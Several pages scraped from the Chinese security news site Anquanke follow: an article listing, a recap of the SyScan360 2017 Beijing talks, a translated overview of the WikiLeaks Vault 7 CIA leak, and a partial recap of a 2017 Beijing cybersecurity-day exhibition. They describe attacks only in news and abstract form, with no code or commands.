代码审计是使用静态分析发现源代码中安全缺陷的方法,能够辅助开发或测试人员在软件上线前较为全面地了解其安全问题,防患于未然,已经成为安全开发生命周期 SDL 和 DevSecOps 等保障体系的重要技术手段。
安全客 360代码卫士 2019-02-18 18:34:48 13426次阅读
安全活动
新课特惠 | 一文读懂人工智能、机器学习、深度学习、强化学习的关系
安全活动 人工智能 机器学习 深度学习 强化学习
根据应用领域的不同,人工智能研究的技术也不尽相同,目前以机器学习、计算机视觉等成为热门的AI技术方向。 安全客联手安全牛课堂为大家带来了新年课程特惠,快来了解下吧~
安全客 安全牛课堂 2019-02-18 17:49:11 11995次阅读
MiSRC
挖洞天使降临!MiSRC双倍金币活动开启!
MiSRC 挖洞 小米安全 双倍金币
MiSRC双倍金币活动来了!成功提交在指定范围的漏洞,将会获得双倍金币奖励!本次活动测试范围包括但不限于web端、移动端、小程序、公众号等。
安全客 小米安全中心 2019-02-18 17:15:58 11945次阅读
漏洞分析
CVE-2018-19134:通过Ghostscript中的类型混淆来远程执行代码
漏洞分析 Ghostscript
在这篇文章中,我将展示如何利用CVE-2018-19134漏洞远程执行任意代码。该漏洞是由类型混淆引起的。2018年11月,该漏洞被发现。如果你想了解更多关于QL技术相关文章,可以翻看我以前的博客。
安全客 我爱南木 2019-02-18 15:30:29 稿费: + 300 23721次阅读
安全报告
1月政企终端安全态势分析报告
安全报告 企业安全
《政企终端安全态势分析报告》是“360终端安全实验室”定期发布的针对政企网络终端的安全态势分析报告。报告数据来自 360 企业安全公有云安全监测数据。
安全客 360威胁情报中心 2019-02-18 15:19:45 15739次阅读
CTF
FireShellCTF2019 babyheap 详细题解
CTF
前两天做了一下 Fireshell 的 pwn 题,难度貌似也不是很大,做了一下堆的 babyheap,这里把详细的解题思路记录一下,很多都是自己在学习堆过程中的一些总结,希望能给同样在入门堆利用的朋友们一些启发。
安全客 H4lo 2019-02-18 15:00:51 稿费: + 600 15765次阅读
linux
Snapd Ubuntu 提权分析
linux 系统安全 snap
想了想,最末分析过的 linux 平台漏洞还是 “脏牛”。近半年多一直在搞其他方面,许久没做漏洞分析了,正好有个提权漏洞换换脑子。
安全客 360CERT 2019-02-18 14:54:38 17857次阅读 1
漏洞分析
Typora XSS 到 RCE (上)
漏洞分析 xss Web安全 RCE Typora
在去年的12月份,我在知乎上看到了一篇名为《如何在Typora编辑器上实现远程命令执行》 的文章。因此我决定要深入挖掘一下,看看 Typora 是否还有其他漏洞。
安全客 Li4n0 2019-02-18 14:35:49 稿费: + 600 22290次阅读
漏洞分析
Nexus Repository Manager 3 远程代码执行漏洞 (CVE-2019-7238) 分析及利用
漏洞分析 远程代码执行
最近1年多基本上都在忙实验室其它的工作,基本上很少关注JAVA安全这块的内容,赶上正好周末休息,加上实验室其它小伙伴对这个漏洞比较关注索性就抽出一点时间跟实验室其它小伙伴一起研究了下,就当学习了。
安全客 360观星实验室 2019-02-18 12:16:47 98754次阅读 2
恶意软件
2018年Android恶意软件专题报告
恶意软件 Android 移动安全
本文为2018年Android恶意软件年度专题总结报告。
安全客 360烽火实验室 2019-02-18 11:30:37 19198次阅读
云安全
CloudGoat云靶机 Part-3:利用AWS Lambda函数提权
云安全
本文将描绘当攻击者拥有用户Joe和Bob的访问密钥,但EC2实例停止服务的情形。如果你是第一次阅读本系列文章,你不知道什么是CloudGoat以及Joe和Bob到底是谁,那么我建议你先阅读本系列的第一部分。
安全客 Hulk 2019-02-18 10:30:10 稿费: + 280 17703次阅读
安全资讯
2月18日每日安全热点 – IDN Visual Security Deep Thinking
安全资讯 安全热点 网络安全热点 每日安全热点
IDN Visual Security Deep Thinking;BlueHatIL 2019议题:Life as an iOS Attacker;offensivecon19议题:fuzzing for JavaScript engines;CVE-2019-7222:KVM中未初始化的内存泄露漏洞披露。
安全客 360CERT 2019-02-18 09:51:39 14551次阅读 3
安全资讯
2月17日每日安全热点 – Facebook CSRF保护绕过,导致帐户接管
安全资讯 安全热点 网络安全热点 每日安全热点
Facebook CSRF保护绕过,导致帐户接管;DCOMrade – 用于枚举易受攻击的DCOM应用程序的Powershell脚本;勒索软件攻击目标MSP以大规模感染客户。
安全客 360CERT 2019-02-17 10:00:56 23661次阅读
安全早知道
瑞典270万医疗健康敏感信息暴露超6年
5小时前
澳大利亚总理称其联邦议会网络遭到恶意攻击
5小时前
Avast研究员发现多阶段恶意软件Rietspoof
5小时前
Google尝试修改API利用以防止Chrome隐身模式被检测
1天前
FINRA(经济监管组织)针对近期钓鱼邮件发布安全警告
1天前
微软商店现挖矿应用 因虚假刷量无法确定实际影响规模
1天前
约会应用在情人节出现数据泄露 是故意为之还是刻意为之
4天前
Google拒掉了超过50%的安卓应用 但仍无法控制安全问题
4天前
8家公司亿条数据在暗网上出售
4天前
Cisco出现安全问题可导致通过旧密码登陆
5天前
OpenOffice 0day漏洞目前已发布微补丁
5天前
恶意软件Shlayer伪装为Flash广泛传播
5天前
黑客挖掘漏洞反被起诉或面临8年监禁
18天前
Basecamp遭爆破攻击 事后迅速解决攻击账号
18天前
Google部分API库失效导致有些服务停运数小时
18天前
Youtube消息功能被大规模利用作诈骗活动
19天前
Google Play百万下载应用收集用户照片并推送色情广告
19天前
Office 365新的隐私与合规使得安全响应能力再次提高
20天前
安全研究表明大规模勒索软件攻击可造成巨大动荡
20天前
Facetime被曝存在安全隐患可实现远程监视
21天前
安全类开源项目精选

输入安全周报订阅邮箱
最新专题

2019-01-31 11:04:59
安全客2018季刊第四季 | 重新定义智能时代的“IoT安全”
投稿须知
寻求合作
活动赛事
更多
众测|饿了么合作伙伴众测活动第一期开启!
2019-02-21 10:00

阿里联合国际知名顶会IJCAI发起AI对抗竞赛
2019-03-04 10:00

活动 | 第三届安胜网络安全技术峰会(2018 ASTC)即将启幕!
2019-1-10 10:00

最新漏洞
更多
mIRC Remote Command Execution – CXSecurity.com
CVE-2019-6453 2019-02-19
Master IP CAM 01 3.3.4.2103 Remote Command Execution – CXSecurity.com
CVE-2019-8387 2019-02-19
Apache CouchDB 2.3.0 Cross Site Scripting – CXSecurity.com
2019-02-19
CMSsite 1.0 post.php SQL Injection – CXSecurity.com
2019-02-19
qdPM 9.1 Cross Site Scripting – CXSecurity.com
CVE-2019-8391 CVE-2019-8390 2019-02-19
活跃作者
360CERT
360CERT是360成立的针对全球重要网络安全事件进行快速预警、应急响应的安全协调中心。
《 2月19日每日安全热点 – APT-C-36: 针对哥伦比亚政府机构和公司的持续攻击》
興趣使然的小胃
肥叶好香锅,孜孜不倦
《 Dirty Sock:Ubuntu提权漏洞分析》
360威胁情报中心
《 盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露》
360代码卫士
360代码卫士是国内第一家专注于软件开发安全的产品线,产品涵盖代码安全缺陷检测、软件编码合规检测、开源组件溯源检测三大方向,分别解决软件开发过程中的安全缺陷和漏洞问题、编码合规性问题、开源组件安全管控问题
《 【缺陷周话】第22期:错误的内存释放对象》
Hulk
《 CloudGoat云靶机 Part-3:利用AWS Lambda函数提权》

安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 0daybank

syscan360

syscan360
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【亮点回顾】2017 SyScan360(北京)
阅读量 31497 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2017-09-11 17:43:14
http://p2.qhimg.com/t014ac5378b01775369.png

会议官网:http://www.syscan360.org/zh/

亮点回顾

签到:

http://p6.qhimg.com/t01821f1243db564ce3.jpg

http://p8.qhimg.com/t010b1496295607bab0.jpg

http://p4.qhimg.com/t01b48f01a0e994d845.jpg

Tomas 致辞:

http://p8.qhimg.com/t017132071957a30595.jpg

谭晓生 致欢迎辞:

http://p9.qhimg.com/t01cd17acb491123cb2.jpg

开场:

http://p0.qhimg.com/t01dfcb69e3e347bbea.jpg

演讲嘉宾:Maxwell Koh

演讲议题:Bypass 2FA, Stealing Private Keys, and the Introduction to 4FAssassin

议题概要:双因子认证并不能保证所有的账户安全,本次演讲将重点展示新发现的技术通过窃取和破解OTP、私钥和客户端证书的方法绕过双因子认证。延时将包括私有密钥被破坏的场景,然后展示攻击者如何利用这些获得更多进入公司内网和获取利润的机会。同时使用一些开发的工具可以用来破坏单个系统,或者使用私钥来破坏整个网络。同时,它还能够分析和识别潜在的私钥,关键的信息提取,以配置目标服务器,破解和删除密码,基于密钥的后门,从而通过利用脆弱的公共密钥认证中的漏洞构建多链接的私密通道。本次演讲将以保护私人密钥免遭盗窃的建议结束,以及在最坏的情况下应该做些什么。

http://p8.qhimg.com/t01a7c85c0a4dd1b2ad.jpg

演讲嘉宾:Mattieu Suiche

演讲议题:the shadow brokers—-Cyber Fear Game Changers

议题概要:影子经纪人是这个网络时代最具有争议的人物之一。在互联网上初露锋芒是在2016年8月,这个秘密黑客组织宣布自己攻破了NSA的防火墙,并公布了思科ASA系列防火墙、思科PIX防火墙的漏洞。因此也迅速成为美国国家安全局斯诺登以来最可怕的噩梦。5月13日开始,一种名为“WanaCrypt0r 2.0”的蠕虫病毒开始在互联网上蔓延,它可以使感染的电脑在10秒内锁住,电脑里所有文件全被加密无法打开,只有按弹窗提示交赎金才能解密,因此也影响了很多的国家和地区。

http://p1.qhimg.com/t0179640ef0ca07f62a.jpg

演讲嘉宾:Yuriy Gurkin

演讲议题:Penetration through ICS Development Software—-potentially devastating attack vector or not? CODESYS 0days examples.

议题概要:在ICS开发工具中,有一个CODESYS编程软件,它广泛应用于能源、工厂和其他自动化技术领域。但是也存在着针对这些软件的工具,比如留下后门进行远程控制。在2015年,大众汽车因其柴油发动机控制器软件丑闻而损失了30%的股份。本次演讲会利用开源代码的渗透测试展示CODESYS编程软件旧版所存在的漏洞以及2个新版本中的两个0day漏洞。

http://p0.qhimg.com/t010ef24204071029e4.png

演讲嘉宾:龚广

演讲议题:Butterfly Effect and Program Mistake-Exploit an “Unexploitable” Chrome Bug

议题概要:360安全团队在PwnFest 2016上攻破Chrome浏览器使用的一个“近乎不可能”的漏洞利用。这个漏洞在Chrome的V8引擎中一处非常小的逻辑错误,在普通人的思路中,这个漏洞几乎不可能被利用。但是360团队结合了多种非常规的利用技巧后,成功稳定地利用了这个漏洞,并通过这个漏洞全球首次攻破了谷歌的最新手机:Google Pixel。

http://p5.qhimg.com/t01823a2645a7144e1d.jpg

演讲嘉宾:Bertin Bervis

演讲议题:Exploiting and abusing web applications flaws in industrial and network communication devices

议题概要:在PLC、数据采集服务器上有大量的通信网管带有web服务器,而这些内容会存在大量的安全隐患,比如利用暴露在互联网上的接口被远程攻击者恶意利用。讲师将主要讲解众多知名厂商的一些案例以及现场漏洞示范来强调这个问题的重要性,同时将分享技巧和技术以便在工业设备中轻松快速地发现这些网络应用程序的漏洞。

http://p4.qhimg.com/t01a2ab3294cba36d01.png

演讲嘉宾:Abdul-Aziz Harir Brian Gorenc Jasiel Spelman

演讲议题:Transforming Open Source to Open Access in Closed Applications: Finding Vulnerabilities in Adobe Reader’s XSLT Engine

议题概要:将开源组件包含到大型的、封闭的应用程序汇总,已经成为现代软件中的一种常见做法。供应商显然从这种方法中获益,因为它允许他们快速地为用户添加功能,而不需要花费更多精力,但是却有很大的安全隐患。本次将通过对Adobe Reader的XSLT的测试进行举例,讨论用于审核Sablotron源码的新技术,以便在Adobe Reader中找到相应的bug,整个讲解以Adobe Reader为例,讲述去年Adobe Reader的XSLT引擎中发现的漏洞的趋势。

http://p0.qhimg.com/t016cd8eac8aee8c309.jpg

大会简介

SyScan360由中国最大的互联网安全公司,全球最大的互联网安全公司之—的360公司主办。大会邀请世界各地优秀互联网安全专家分享最新信息安全研究成果,呈现满足亚洲信息安全需求的演讲课题,发布最新国际安全趋势及方向。同时,大会秉承专业严谨的态度,精心筛选不同信息安全领域的顶尖专家讲师,使演讲题材专注于技术研讨同时具备最高的专业和研究水平,在业内拥有良好的口碑和忠实的拥趸。

主办方

360互联网安全中心

会议地点

国家会议中心

会议时间

2017.09.11 – 2017.09.12

会议日程

http://p4.qhimg.com/t01581787e30fcfb862.png

http://p4.qhimg.com/t01a52561fe1119ba97.png

往届回顾

SyScan360 2017 西雅图站

活动发布、推广及现场报道请联系安全客 duping@360.cn

商务合作,文章发布请联系 dengjinling@360.cn
安全活动

包子 官方小编 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ARM汇编之堆栈溢出实战分析四(GDB)
2019-02-19 16:00:28

盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15

从两道CTF实例看python格式化字符串漏洞
2019-02-19 14:30:48

Typora XSS 到 RCE(下)
2019-02-19 11:30:28
|发表评论
发表你的评论吧
昵称
带头大哥
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
包子
此人是个小可爱呀小可爱
文章
154
粉丝
16
TA的文章
人海中,我在寻找你 ——360代码安全实验室寻人启事
2017-12-26 17:17:00
360网络安全部内推专场(1天知结果,3天拿offer!)
2017-12-25 19:20:31
完美世界安全应急响应中心(PWSRC)上线啦!
2017-12-25 17:54:50
好书推荐 | Android应用安全防护和逆向分析(赠书福利又来了!)
2017-12-20 16:31:11
多地招聘 | 360华东安服招人,不加班,美滋滋~
2017-12-18 18:59:14
输入关键字搜索内容
相关文章
新课特惠 | 一文读懂人工智能、机器学习、深度学习、强化学习的关系
好课推荐,转发有礼 |《一篇文章了解云安全领域的新宠CCSK》
精彩回顾 | 2019数字中国网络安全生态峰会
58赶集集团第一届安全技术沙龙
SRC白帽子技术沙龙 | 安全+ WiFi万能钥匙SRC 苏宁SRC
陌陌惊喜 | 双倍积分活动来袭,单个漏洞基础奖励可达两万元
漏洞暴击!︱双11花掉的钱BUGX给你补回来
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

CIA公布解密文件

CIA公布解密文件
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【国际资讯】维基解密CIA绝密文件泄露事件,不得不说的10件事
阅读量 56370 | 稿费 260

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2017-03-10 14:48:21
译文声明
本文是翻译文章,文章原作者,文章来源:thehackernews.com
原文地址:http://thehackernews.com/2017/03/wikileaks-cia-vault7-leak.html

译文仅供参考,具体内容表达以及含义原文为准

×
http://p6.qhimg.com/t01c3fee8b65b614175.png

翻译:WisFree

预估稿费:260RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

前言

就在昨天,维基解密(WiKiLeaks)公布了数千份文档并揭秘了美国中央情报局关于黑客入侵技术的最高机密,根据泄密文档中记录的内容,该组织不仅能够入侵iPhone手机、Android手机和智能电视,而且连Windows、Mac和Linux操作系统也难逃他们的“魔掌”。

外界将此次泄漏事件取名为Vault 7,Vault 7公布的机密文件记录的是美国中央情报局(CIA)所进行的全球性黑客攻击活动,而Vault 7仅仅是该系列(该系列代号为“Year Zero”)的第一部分,维基解密还将会在接下来的几天里陆续公布剩下的机密文档。

根据维基解密提供的信息,美国中央情报局在发现了产品中的安全漏洞之后,并不会将漏洞上报给相应厂商,而是直接利用这些漏洞来入侵用户的软件或硬件,例如iPhone手机、Android手机和三星智能电视等等,而这些东西都是全球数百万用户每天都可能会使用到的东西。

http://p2.qhimg.com/t01f46b764b755a59e5.png

其中的一份泄密文件还暗示称,美国中央情报局甚至还在寻找能够远程控制智能汽车的黑客工具,因为这些工具可以让CIA的特工们给目标车辆带来“意外事件”,而通过远程黑客工具来实现的话不仅效率高,而且基本上是无法被检测到的。

很多安全研究专家、企业、以及非营利性组织目前仍在对Vault 7的这8761份机密文档进行分析,因此我们将在这篇文章中跟大家讨论一下一些与Vault 7相关的内容。

No.1:维基解密曝光了CIA的移动端攻击技术

Vault7-美国中央情报局有一大堆令人印象深刻的攻击方法来入侵你的iOS、Android以及Windows手机。

http://p8.qhimg.com/t01f6ba63fa9e32a0a3.png

据称,Vault7包含8761份机密文档及文件,这些文件记录了CIA针对Android以及苹果智能手机所研发的入侵破解技术细节,其中有些技术甚至还可以拿到目标设备的完整控制权。维基解密认为,美国中央情报局的移动研发部门旗下还有一个非常复杂的团队,这个团队专门负责研究0 day漏洞的利用技术并开发相应的恶意软件,而这些恶意软件不仅能够从iPhone以及类似iPads这样的运行了iOS系统的苹果产品中窃取数据,它们甚至还可以完全接管iOS设备。

根据曝光文件透露的信息,其中的某些攻击技术甚至强大到允许攻击者远程接管目标设备idea内核,也就是负责控制智能手机运行的操作系统核心部分,有的还可以获取到设备的root访问权,攻击者可以通过这种权限获取到目标设备的地理位置、通信以及联系人等信息。这种类型的攻击技术主要使用于某些有针对性的攻击活动,而不是用来进行大规模监控的。泄密文档还曝光了美国中央情报局所能进行的一些特殊攻击,入侵最新版本的iOS和Android系统其实也不在话下。

No.2:CIA并不会去破解加密App,而是直接绕过它们

Vault7-美国中央情报局研发的恶意软件可以在没有破解加密算法的情况下直接读取你的隐私聊天信息。

http://p0.qhimg.com/t0193f80a78df0d77b6.png

维基解密在一份声明中指出:

“CIA首先会入侵目标智能手机,然后在语音以及文字消息被加密之前收集到原始的消息内容,所以他们实际上是绕过了主流安全通信软件的加密保护,受影响的产品包括WhatsApp、Signal、Telegram、Confide和Cloakman在内。”

虽然笔者认为这份声明所说的内容没毛病,但就在维基解密公布了这份声明的几个小时之后,仍然很多人对文件中的机密内容产生了错误的认知,因为很多人认为美国中央情报局已经能够破解类似Signal和WhatsApp这种主流安全聊天软件所使用的加密算法了,而事实并非如此。

实际上,美国中央情报局有一款能够获取目标手机完整访问权的黑客工具,它之所以能够“绕过”加密信息App,是因为它能够让手机中的安全系统完全失效,并允许CIA的特工远程访问到目标手机。这就好比是你坐在目标用户的身后,然后在他与别人聊天的时候你在偷看他的内容一样,这并不意味着聊天软件就一定存在安全问题。这也就意味着,当你能够随时监控目标设备系统的一举一动时,那么信息在传输过程中是否被加密已经不重要了。

但是,维基解密此次曝光的文件没有透露针对Signal和WhatsApp的攻击技术细节,而只是透露了该组织能够远程劫持手机并在用户的隐私消息被加密和和发送之前获取到这些消息内容。

No.3:CIA研发了针对Windows、Linux和macOS操作系统的恶意软件

Vault 7-美国中央情报局海燕发了跨平台的恶意软件来入侵Windows、Linux以及macOS计算机。

维基解密此次泄漏的文件还包含了关于跨平台恶意软件的信息,美国中央情报局可以利用这种恶意软件来远程入侵和监控运行了Windows、macOS以及Linux操作系统的个人计算机。这也就意味着,CIA不仅能够绕过PGP邮件加密,而且甚至还能够绕过你的VPN,你在自己电脑上所进行的各种网络活动都可能随时处于监控之下,即使你使用了Tor浏览器。

http://p3.qhimg.com/t0106f4e329e3c28e05.png

同样的,这并不意味着PGP、VPN或Tor浏览器存在安全问题,也不意味着CIA能够破解这些服务。但是由于他们能够入侵并完全控制任意设备(例如智能手机、笔记本电脑或智能电视),所以他们能够绕过这些服务来监控目标设备上发生的所有用户行为。

No.4:CIA借鉴了其他恶意软件的代码

Vault 7-美国中央情报局借鉴了很多当前流行的恶意软件代码,并利用这些代码开发出了自己的间谍软件。

没错,美国中央情报局不仅自己会去研发新型的攻击技术,而且还会从其他开源的恶意软件借鉴代码。其中有一份文件提到了CIA如何从目前已知的恶意软件样本中借鉴代码,并且根据自己的需要对代码进行了自定义修改以满足其特殊的需求。维基解密曝光的文件显示:“UMBRAGE团队目前正在开发和维护的应用开发技术以及代码库从其他恶意软件中借鉴了大量代码,而这个代码库所提供的代码段能够迅速被整合并利用到有针对性的攻击活动中。”

No.5:CIA使用捆绑了恶意软件的App来监控目标

Vault 7:Fine Dining攻击:美国中央情报局会使用捆绑了恶意软件的App来监控目标。

泄露文档中包含一个名为“Fine Dinning”的文件,但其中并不包含任何的0 day漏洞利用技术,而是一堆捆绑了恶意软件的应用程序。

Fine Dining由CIA网络情报中心的下属部门OSB负责开发,Fine Dining是一种具有高度通用性的攻击技术,在经过特殊配置之后可以将其用于各种攻击场景,但是需要CIA的特工物理访问目标设备。CIA的特工会将这些捆绑了恶意软件的应用存储在U盘里面,然后再将他们插入目标设备并从中收集数据。

No.6:CIA极度渴望破解苹果的加密算法

Vault 7-美国中央情报局非常希望能够破解苹果设备所采用的加密算法,并且也为之努力多年了。

泄漏文件显示,美国中央情报局正在使用一些“物理性”以及“非入侵性”的技术来破解苹果设备中存储的关键安全密钥。不过除了CIA之外,美国联邦调查局(FBI)也在努力去发现和利用苹果设备中的漏洞。

http://p0.qhimg.com/t01d0fd9305611b11f7.png

No.7:苹果表示已经修复了此次泄漏文档所记录的大部分漏洞

Vault 7-苹果对外声称,他们已经将CIA泄密文档中披露的绝大多数iOS安全漏洞修复了。

除了Android和三星智能电视中的漏洞之外,泄密文档中还记载了14个iOS漏洞的详细信息,并且文档还描述了CIA如何利用这些安全问题来追踪和监视目标用户的通信数据。根据苹果公司提供的信息,维基解密此次泄漏的CIA机密文档中的大部分iOS漏洞已经在一月份发布的iOS最新版本中得到了修复,目前苹果的工程师们仍在修复剩下的安全漏洞。

No.8:不安全的物联网设备将允许CIA随时随地攻击任何人

Vault 7-美国中央情报局可以入侵你的智能电视和其他智能设备,并利用这些设备来监视你的一举一动。

除了能够攻击大量软件和服务的漏洞利用技术以及黑客工具之外,Vault 7还详细记录了一种名叫Weeping Angel的监控技术,美国中央情报局正在使用这种技术来渗透智能电视。经过测试发现,Weeping Angel可以用来入侵三星智能电视并让其进入一种“伪关机”模式,此时用户会以为电视处于关闭状态,但其实CIA正在用这台智能电视记录你的语音聊天信息。

No.9:维基解密此次泄漏的CIA机密文档其影响力弱于斯诺登的NSA泄密事件

Vault 7-跟NSA的TAO团队相比,CIA的能力肯定要弱一些,而Vault 7的影响力肯定也没有斯诺登泄密事件来得严重。

http://p7.qhimg.com/t01c5beb12e000780a6.png

泄漏文件中没有谈到针对智能手机和个人电脑的大规模监控活动,从技术层面上来说,NSA手上的技术远比CIA的要复杂和先进得多,而且NSA所拥有的安全技术人才也是CIA所不能相比的。

No.10:前中情局局长认为,维基解密此次曝光的文件会让美国变得更加不安全

Vault 7-前中情局局长认为,维基解密此次曝光的CIA机密文件毫无疑问会让大量美国公民的生命至于风险之中。

总结

Vault 7仅仅只是一个开始,维基解密还会陆续曝光剩下的CIA机密文件,随着“Year Zero”系列其余的部分逐渐揭开神秘面纱,人们将会知道更多政府和情报机构的那些不可告人的秘密。

本文翻译自 thehackernews.com, 原文链接 。如若转载请注明出处。
安全资讯

WisFree 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ARM汇编之堆栈溢出实战分析四(GDB)
2019-02-19 16:00:28

盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15

从两道CTF实例看python格式化字符串漏洞
2019-02-19 14:30:48

Typora XSS 到 RCE(下)
2019-02-19 11:30:28
|发表评论
发表你的评论吧
昵称
吃瓜群众
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
WisFree
这个人太懒了,签名都懒得写一个
文章
450
粉丝
13
TA的文章
垃圾邮件服务,声称可以在任何地方“打印”任何东西
2018-12-06 11:31:26
黑掉5万多台打印机,只为推广他的YouTube频道?
2018-12-04 11:08:46
“丝绸之路”聘请的杀手在温哥华被捕
2018-11-26 11:16:15
FBI警告银行称:网络犯罪分子正计划对全球范围内的ATM实施攻击
2018-08-16 15:54:10
DiskShadow工具介绍:VSS绕过、持久化感染和活动目录数据库提取
2018-04-02 15:00:20
输入关键字搜索内容
相关文章
2月19日每日安全热点 – APT-C-36: 针对哥伦比亚政府机构和公司的持续攻击
2月18日每日安全热点 – IDN Visual Security Deep Thinking
2月17日每日安全热点 – Facebook CSRF保护绕过,导致帐户接管
2月16日每日安全热点 – Google Chrome API 会泄露浏览状态
256万人脸识别数据遭泄露,“脸”还安全吗?
2月15日每日安全热点 – Docker安全漏洞揭露:CVE-2019-5736缓解措施
情人节每日安全热点 – 韩国通过监听SNI流量审查互联网
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

429首都网络安全日

429首都网络安全日
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【精彩集锦】安全客带您逛逛429首都网络安全日(4.26-4.28)
阅读量 74073 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2017-04-28 10:16:11
http://p7.qhimg.com/t013405ed4c655a03d9.jpg

前言

为深入贯彻落实中央网络安全与信息化工作座谈会精神,积极推进网络强国建设,推动首都网络安全工作,自2014年起,北京市政府决定将每年的4月29日作为“首都网络安全日”,至今,该系列活动已成功举办了三届。此次活动还将延续“网络生活共享,网络安全同担”的主题,届时将召开“北京网络与信息安全博览会”,百余家企业参展;同时,业内大腕云集,现场活动精彩纷呈。

会议日程

https://p2.ssl.qhimg.com/t01d1556e636b83cc34.png

4月27日分论坛日程

https://p3.ssl.qhimg.com/t01e964165ab7115df7.png

https://p5.ssl.qhimg.com/t01f7c08c753784dafd.png

https://p5.ssl.qhimg.com/t01f7c08c753784dafd.png

https://p3.ssl.qhimg.com/t01bcef7b20dea6cf2e.png

https://p2.ssl.qhimg.com/t010c8d89d7469d27f7.png

https://p0.ssl.qhimg.com/t01edddfaa4dc40deeb.png

https://p1.ssl.qhimg.com/t01da8d8ce71d2e82a2.png

作为本届系列宣传活动的重要内容之一,“360春秋杯”国际网络安全挑战赛与“2017年北京国际互联网科技博览会暨世界网络安全大会”形成有机联动,共同从网络安全技术创新、网络安全人才培养、全民网络安全意识教育等多个层面将大赛打造成一个国际化、专业化、普及化的竞赛平台。

决赛将在北京展览馆举行,通过永信至诚e春秋竞赛平台,采用时下主流的网络对抗赛制(AWD),并邀请3支国际顶级战队,两支香港、澳门地区的战队,三支百度杯优秀战队进行同场比拼,比赛将实现京港澳地区与全球顶级战队的网络安全竞赛对抗场面。

安全客将全程图文直播”360春秋杯“,欢迎小伙伴们关注呦!

https://p5.ssl.qhimg.com/t0199c93540be280c70.jpg

精彩集锦

2017年第四届“429首都网络安全日”举办时间为4月26日、27日、28日,地点为北京展览馆。

http://p4.qhimg.com/t01c978bcf687e3f6c7.jpg

没有提前报名的小伙伴们,可到现场报名参加,进去展馆前,工作人员会贴心的为您发放参展指南呦~

http://p8.qhimg.com/t01db59dfc4fe6c5f8b.jpg

http://p4.qhimg.com/t01ce54c269289257f6.jpg

阿里巴巴集团展区

阿里巴巴首次携全线业务展示在安全、互联网+公益等多个领域的成果。十八年发展,阿里巴巴已经构建起广袤的生态,横跨电商、大文娱、云计算以及物流等领域,形态丰富,体系庞大,是实打实的新“经济体”。2005年,阿里巴巴成立集团安全部,当时的初衷非常简单,保护阿里生态的安全。十多年来,这个团队一直在安全领域做技术研究、产品开发、方案制定,进行了很好的生态布局。

http://p3.qhimg.com/t0173c585e70021214a.jpg

http://p8.qhimg.com/t016020b3cacbd3e850.jpg

360公司展区

安全始终是360的核心业务,而360也在重新定义“大安全”的概念。未来,依靠自身在安全领域的雄厚实力和技术积累,360希望能够支持解决从国家安全、社会安全、基础设施安全、企业安全,到个人安全、人身安全在内的一系列安全问题。

http://p7.qhimg.com/t013cb1012290501274.jpg

360“变脸”体验专区

人脸识别越来越常见,春运也已经能刷脸进站。为了让参观者花式体验这项技术,360人工智能研究院在现场设置了“变脸”体验专区,通过花椒相机的变脸特效,从蝙蝠侠到呆萌动物,观众可随时变身。

http://p2.qhimg.com/t018aa7db88743123d5.jpg

360绵羊墙展示区

公共场合免费WiFi上网越来越方便了,但免费WIFI正成为各种网络陷阱、钓鱼诈骗的“重灾区”,免费WiFi环境中,用户隐私和数据安全难以保证。360在活动现场设置“绵羊墙”体验区的目的就是让用户直观感知随意接入免费WiFi的安全风险,提醒用户在公共场所使用手机、电脑等上网设备时注意安全,如果电脑、手机等智能设备中包含敏感信息,请不要在公共场所随意接入免费公共网络。

http://p7.qhimg.com/t01c3387b35d0474c7e.jpg

网络透明人体验区

“网络透明人”模拟的是现实生活中盗刷银行卡的黑客攻击。360展区设置了一道看似非常普通的安检门,然而一旦有观众从中穿过,那么他的姓名、身份证号、银行账户、账户最近几笔的交易资料、甚至账户结余金额等信息,就会显示在面前的镜子中,变身成为“网络透明人”。

http://p8.qhimg.com/t014de82d02fc2668bf.jpg

百度安全展区

今年“安全日”百度安全将以全新的互联网安全思维,携百度安全实验室出品的百度安全OASES开放自适应安全扩展系统(百度在业界首创用于解决Android生态安全问题的解决方案)、百度昊天镜威胁情报平台(百度安全业务下一代大数据智能情报分析平台)和AVP移动应用分析平台(新一代综合性移动安全服务SaaS平台)扑面而来,将结合市政交通、金融支付、智慧医疗、智慧生活等大型综合社会服务领域安全隐患,真实演绎人工智能技术在全新应用领域中的智能解决方案。

http://p8.qhimg.com/t01615a17f81e0474cb.jpg

安赛展区

安赛,始终专注于智能安全。本次大会,安赛携全面升级的智能安全产品精彩亮相,重点展示以“智能”为核心的产品,涵盖漏洞安全管理(AIScanner)、下一代未知威胁发现与溯源(WebIDS)、高级持续性威胁预警(AIAPT)、智能云应用防火墙(Cloud-WAF)以及网络安全态势感知系统(AICyber-Security)等,展现了安赛科技的智能安全分析解决方案在日益严峻的企业安全威胁面前所发挥的重要作用。

https://p2.ssl.qhimg.com/t01820bca494e127c88.png

知道创宇展区

